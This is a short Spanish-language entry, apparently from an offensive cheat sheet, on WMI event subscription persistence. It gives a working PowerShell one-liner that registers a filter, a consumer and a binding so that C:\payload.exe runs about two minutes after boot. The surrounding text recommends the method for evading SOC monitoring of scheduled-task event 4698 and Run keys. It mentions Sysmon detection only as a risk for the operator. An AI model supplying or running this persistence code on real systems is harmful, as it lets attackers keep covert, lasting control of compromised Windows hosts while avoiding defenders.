WMI Event Subscription

$filter = Set-WmiInstance -Namespace root\subscription -Class __EventFilter -Arguments @{Name='Updater'; Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime > 120"}; $consumer = Set-WmiInstance -Namespace root\subscription -Class CommandLineEventConsumer -Arguments @{Name='Updater'; CommandLineTemplate='C:\payload.exe'}; Set-WmiInstance -Namespace root\subscription -Class __FilterToConsumerBinding -Arguments @{Filter=$filter; Consumer=$consumer}

Registra un filtro y un consumidor WMI que ejecutan el payload cuando se cumple una condición del sistema, sin crear ningún proceso al instalarse.

Ejecútalo cuando necesitas persistencia que no genere evento de creación de proceso ni de tarea: WMI se registra como datos en root\subscription y el payload corre cuando el filtro dispara (por ejemplo, a los 2 minutos de arranque del sistema). Es la persistencia favorita en hosts donde el SOC mira 4698 y Run keys.

Si el equipo azul tiene Sysmon 19/20/21 (eventos WMI), el registro se ve al momento. Los consumidores CommandLineEventConsumer dejan el comando en claro en WMI: cualquier query de detección lo encuentra. No lo uses si el host tiene hardening que bloquea la escritura en root\subscription.